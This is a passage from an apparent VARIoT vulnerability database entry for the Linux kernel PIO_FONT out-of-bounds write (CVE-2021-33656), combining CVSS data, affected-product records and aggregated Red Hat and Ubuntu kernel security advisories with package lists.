perf-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm python3-perf-4.18.0-372.70.1.el8_6.x86_64.rpm python3-perf-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64: bpftool-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debug-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-tools-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-tools-libs-devel-4.18.0-372.70.1.el8_6.aarch64.rpm perf-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm python3-perf-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm

ppc64le: bpftool-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debug-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-tools-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-tools-libs-devel-4.18.0-372.70.1.el8_6.ppc64le.rpm perf-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm python3-perf-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm

x86_64: bpftool-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debug-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-tools-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-tools-libs-devel-4.18.0-372.70.1.el8_6.x86_64.rpm perf-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm python3-perf-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2021-33656 https://access.redhat.com/security/cve/CVE-2022-42896 https://access.redhat.com/security/cve/CVE-2023-1637 https://access.redhat.com/security/cve/CVE-2023-1829 https://access.redhat.com/security/cve/CVE-2023-2002 https://access.redhat.com/security/cve/CVE-2023-2124 https://access.redhat.com/security/cve/CVE-2023-3390 https://access.redhat.com/security/cve/CVE-2023-20593 https://access.redhat.com/security/cve/CVE-2023-28466 https://access.redhat.com/security/cve/CVE-2023-35788 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIcBAEBCAAGBQJk7gVaAAoJENzjgjWX9erEbPcP/A7VJs/bk9ehr9RmtFheMoZw aTjj77INTVUXeEw303RN0MY4WeA9iNLfoawU9pQwKSOTPFN2LH/dX5M5G4z8fcF4 AqJ52MLnaRvfqvGR/VBL5ndG6Txal4qBaEthXiZPjXVLPdLBLUpKxFvc037T3vLa N1TlS84iuCj+lRKKK3mWzwpuxF+7rG5TyjfmKxBpdVpiy+3CesWdg8z/cp3yHnZR D+/bKMlWaFrot6epZTolqXR3q8gtzdfdvBT+uNCqWFLC4fbRcECz659shdKCe94s au3GaLQoSsv/1o2/Fr9p0X2355CUwo/blWmQRdxHhCrNVAW43zct7UdIefjQFdlN JMEKMLPlsPIqwFM5O24oXNwu2WDFBqhRqVOpU29wCb2A+nZX9KW7G5+wraGQsUle YKt8MyQTrmruN21UqRGTMBUzFmVcVbMoVuKhw8Ruzu+LT7Q8emlVlUIxdeZevVyI qAsK4u/21qEur8snQUZOs1K5JZ/eGvPPOFIlDKamAZUA2KMBRHVf4UpXWRl+yUNZ BwVlqJ883g5fzkyn610ip8wezvIt6JHbQTwfn3GL+GlZm8C6P7TnInRyRAPrEVyb x6ZgJXJcUSvxQ5vfDRxDzQBaki0LlsxEu0z4MNWTlQkijDMqEt+YvOoWnAPOfb6S E/3xFaymeUv8HNa2jzZE =8lpC -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202207-1358",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.127"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "openeuler",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "20.03"
      },
      {
        "model": "openeuler",
        "scope": null,
        "trust": 0.8,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33656"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:huawei:openeuler:20.03:sp3:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:huawei:openeuler:20.03:sp1:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:huawei:openeuler:20.03:-:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.127",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33656"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168221"
      },
      {
        "db": "PACKETSTORM",
        "id": "168236"
      },
      {
        "db": "PACKETSTORM",
        "id": "168237"
      },
      {
        "db": "PACKETSTORM",
        "id": "168177"
      },
      {
        "db": "PACKETSTORM",
        "id": "168251"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2021-33656",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "PHYSICAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 0.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Physical",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 6.8,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2021-33656",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-33656",
            "trust": 1.8,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-020211"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33656"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "When setting font with malicous data by ioctl cmd PIO_FONT,kernel will write memory out of bounds. Linux Kernel Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. ==========================================================================\nUbuntu Security Notice USN-5580-1\nAugust 24, 2022\n\nlinux-aws vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n\nDetails:\n\nIt was discovered that the framebuffer driver on the Linux kernel did \nnot verify size limits when changing font or screen size, leading to an \nout-of-bounds write. A local attacker could use this to cause a denial \nof service (system crash) or possibly execute arbitrary code. \n(CVE-2021-33655)\n\nIt was discovered that the virtual terminal driver in the Linux kernel \ndid not properly handle VGA console font changes, leading to an \nout-of-bounds write. A local attacker could use this to cause a denial \nof service (system crash) or possibly execute arbitrary code. A remote attacker could \nuse this to expose sensitive information (kernel memory). (CVE-2022-20368)\n\nDomingo Dirutigliano and Nicola Guerrera discovered that the netfilter\nsubsystem in the Linux kernel did not properly handle rules that \ntruncated packets below the packet header size. When such rules are in \nplace, a remote attacker could possibly use this to cause a denial of \nservice (system crash). (CVE-2022-36946)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n   linux-image-4.4.0-1150-aws      4.4.0-1150.165\n   linux-image-aws                 4.4.0.1150.154\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.6.6 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/\n\nSecurity Fix(es):\n* CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command\n* CVE-2023-32314 vm2: Sandbox Escape\n* CVE-2023-32313 vm2: Inspect Manipulation\n\n3. Solution:\n\nFor Red Hat Advanced Cluster Management for Kubernetes, see the following\ndocumentation for details on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2187525 - CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command\n2208376 - CVE-2023-32314 vm2: Sandbox Escape\n2208377 - CVE-2023-32313 vm2: Inspect Manipulation\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2023:4789-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2023:4789\nIssue date:        2023-08-29\nCVE Names:         CVE-2021-33656 CVE-2022-42896 CVE-2023-1637 \n                   CVE-2023-1829 CVE-2023-2002 CVE-2023-2124 \n                   CVE-2023-3390 CVE-2023-20593 CVE-2023-28466 \n                   CVE-2023-35788 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 8.6\nExtended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, x86_64\nRed Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in\nnet/bluetooth/l2cap_core.c (CVE-2022-42896)\n\n* kernel: Use-after-free vulnerability in the Linux Kernel traffic control\nindex filter (CVE-2023-1829)\n\n* kernel: UAF in nftables when nft_set_lookup_global triggered after\nhandling named and anonymous sets in batch requests (CVE-2023-3390)\n\n* kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()\n(CVE-2023-35788)\n\n* kernel: when setting font with malicious data by ioctl PIO_FONT, kernel\nwill write memory out of bounds (CVE-2021-33656)\n\n* kernel: save/restore speculative MSRs during S3 suspend/resume\n(CVE-2023-1637)\n\n* Kernel: bluetooth: Unauthorized management command execution\n(CVE-2023-2002)\n\n* kernel: OOB access in the Linux kernel\u0027s XFS subsystem (CVE-2023-2124)\n\n* hw: amd: Cross-Process Information Leak (CVE-2023-20593)\n\n* kernel: tls: race condition in do_tls_getsockopt may lead to\nuse-after-free or NULL pointer dereference (CVE-2023-28466)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* Simultaneous writes to a page on xfs can result in zero-byte data\n(BZ#2184103)\n\n* Invalid character detected by rpminspect in\nDocumentation/translations/zh_CN/process/magic-number.rst (BZ#2208286)\n\n* Low memory deadlock with md devices and external (imsm) metadata handling\n- - requires a kernfs notification backport (BZ#2208542)\n\n* Windows Server 2019 guest randomly pauses with \"KVM: entry failed,\nhardware error 0x80000021\" (BZ#2211663)\n\n* Marvell 8.7 Bug qedi shutdown handler hangs upon reboot (BZ#2215334)\n\n* aacraid misses interrupts when a CPU is disabled resulting in scsi\ntimeouts and the adapter being unusable until reboot. (BZ#2216499)\n\n* rbd: avoid fast-diff corruption in snapshot-based mirroring [8.9]\n(BZ#2216770)\n\n* OCS 4.8 cephfs kernel crash :  mds_dispatch ceph_handle_snap unable to\nhandle kernel NULL (BZ#2218273)\n\n* FJ8.6 Bug: System panic occurs because the list used by i40e driver is\ncorrupted (BZ#2219262)\n\n* st_gmac tx-checksum offload on vlan is not consistent with st_gmac\ninterface (BZ#2219908)\n\n* Regression of 3b8cc6298724 (\"blk-cgroup: Optimize blkcg_rstat_flush()\")\n(BZ#2220811)\n\n* refcount_t overflow often happens in mem_cgroup_id_get_online()\n(BZ#2221011)\n\n* Scheduler update (rhel8.8) (BZ#2221304)\n\n* RHEL8.6 boot panic with message \"kernel BUG at lib/list_debug.c:28!\"\n(BZ#2222247)\n\n* Enable conntrack clash resolution for GRE (BZ#2223543)\n\n* Intel 8.8 BUG SPR perf: Workaround the UPI \nintel_uncore_has_discovery_tables issue on SPR MCC and LCC (BZ#2225514)\n\n* KVM: x86: fix sending PV IPI (BZ#2226580)\n\n* libceph: harden msgr2.1 frame segment length checks [8.x] (BZ#2227074)\n\nEnhancement(s):\n\n* Mellanox 8.7 FEAT mlx5: It\u0027s possible to enable LRO when XDP is active\n(BZ#2165585)\n\n* Export symbol pci_find_host_bridge (BZ#2225335)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2108696 - CVE-2021-33656 kernel: when setting font with malicious data by ioctl PIO_FONT, kernel will write memory out of bounds\n2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c\n2179000 - CVE-2023-28466 kernel: tls: race condition in do_tls_getsockopt may lead to use-after-free or NULL pointer dereference\n2181891 - CVE-2023-1637 kernel: save/restore speculative MSRs during S3 suspend/resume\n2187308 - CVE-2023-2002 Kernel: bluetooth: Unauthorized management command execution\n2187439 - CVE-2023-2124 kernel: OOB access in the Linux kernel\u0027s XFS subsystem\n2188470 - CVE-2023-1829 kernel: Use-after-free vulnerability in the Linux Kernel traffic control index filter\n2213260 - CVE-2023-3390 kernel: UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests\n2215768 - CVE-2023-35788 kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()\n2217845 - CVE-2023-20593 hw: amd: Cross-Process Information Leak\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS EUS (v.8.6):\n\nSource:\nkernel-4.18.0-372.70.1.el8_6.src.rpm\n\naarch64:\nbpftool-4.18.0-372.70.1.el8_6.aarch64.rpm\nbpftool-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-core-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-cross-headers-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debug-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debug-core-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debug-devel-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debug-modules-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-devel-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-headers-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-modules-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-modules-extra-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-tools-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-tools-libs-4.18.0-372.70.1.el8_6.aarch64.rpm\nperf-4.18.0-372.70.1.el8_6.aarch64.rpm\nperf-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\npython3-perf-4.18.0-372.70.1.el8_6.aarch64.rpm\npython3-perf-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-372.70.1.el8_6.noarch.rpm\nkernel-doc-4.18.0-372.70.1.el8_6.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-372.70.1.el8_6.ppc64le.rpm\nbpftool-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-core-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-cross-headers-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debug-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debug-core-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debug-devel-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debug-modules-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-devel-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-headers-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-modules-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-modules-extra-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-tools-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-tools-libs-4.18.0-372.70.1.el8_6.ppc64le.rpm\nperf-4.18.0-372.70.1.el8_6.ppc64le.rpm\nperf-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\npython3-perf-4.18.0-372.70.1.el8_6.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-372.70.1.el8_6.s390x.rpm\nbpftool-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-core-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-cross-headers-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-debug-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-debug-core-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-debug-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-debug-devel-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-debug-modules-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-debug-modules-extra-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-devel-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-headers-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-modules-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-modules-extra-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-tools-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-tools-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-zfcpdump-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-zfcpdump-core-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-372.70.1.el8_6.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-372.70.1.el8_6.s390x.rpm\nperf-4.18.0-372.70.1.el8_6.s390x.rpm\nperf-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm\npython3-perf-4.18.0-372.70.1.el8_6.s390x.rpm\npython3-perf-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-372.70.1.el8_6.x86_64.rpm\nbpftool-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-core-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-cross-headers-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debug-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debug-core-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debug-devel-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debug-modules-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-devel-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-headers-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-modules-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-modules-extra-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-tools-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-tools-libs-4.18.0-372.70.1.el8_6.x86_64.rpm\nperf-4.18.0-372.70.1.el8_6.x86_64.rpm\nperf-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\npython3-perf-4.18.0-372.70.1.el8_6.x86_64.rpm\npython3-perf-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\n\nRed Hat CodeReady Linux Builder EUS (v.8.6):\n\naarch64:\nbpftool-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-372.70.1.el8_6.aarch64.rpm\nperf-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\npython3-perf-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-372.70.1.el8_6.ppc64le.rpm\nperf-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-372.70.1.el8_6.x86_64.rp